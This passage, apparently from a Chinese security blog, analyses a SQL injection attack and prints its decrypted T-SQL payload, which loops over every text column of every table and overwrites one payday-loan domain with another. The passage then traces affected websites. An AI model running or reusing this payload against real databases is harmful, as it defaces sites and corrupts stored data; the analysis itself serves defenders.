虽然User-Agent是自定义的，但根据“en-US”字样可以估计是攻击来源是国外。

对攻击恶意代码内容解密并整理后，如下：

setansi_warnings off

DECLARE @T VARCHAR(255),@C VARCHAR(255)

DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME

fromINFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t

wherec.DATA_TYPE in ('nvarchar','varchar','ntext','text')

andc.CHARACTER_MAXIMUM_LENGTH>10

andt.table_name=c.table_name

andt.table_type='BASE TABLE'

OPEN Table_Cursor

FETCH NEXT FROM Table_Cursor INTO @T,@C

WHILE(@@FETCH_STATUS=0)

BEGIN

EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''corypaydayloans.com'', ''maxxpaydayloans.com'') where ['+@C+'] like ''%corypaydayloans.com%'' ')

FETCH NEXT FROM Table_Cursor INTO @T,@C

END

CLOSE Table_Cursor

DEALLOCATE Table_Cursor

这段攻击代码是针对SQL Server数据库的，如果网站有漏洞，该代码就会执行，并会替换数据库中数据。从Update语句中，看到有两个网址，分别是corypaydayloans.com和maxxpaydayloans.com，目前这两个网址均无法正常访问。

将corypaydayloans.com、maxxpaydayloans.com作为关键字在搜索引擎中搜索，结果分别如下图：

从搜索结果中可以看到，有不少中国的网站已经受到攻击（暂时没有找到受到攻击的国外站点），且内容被替换成这两个域名了，不过大部分网站已经得到了修复，但还有少数存在漏洞的站点仍受到攻击，在这些受到攻击的站点中，还发现部分网站的内容被替换成另外一个域名：willpaydayloans.com。比如这个受攻击的页面：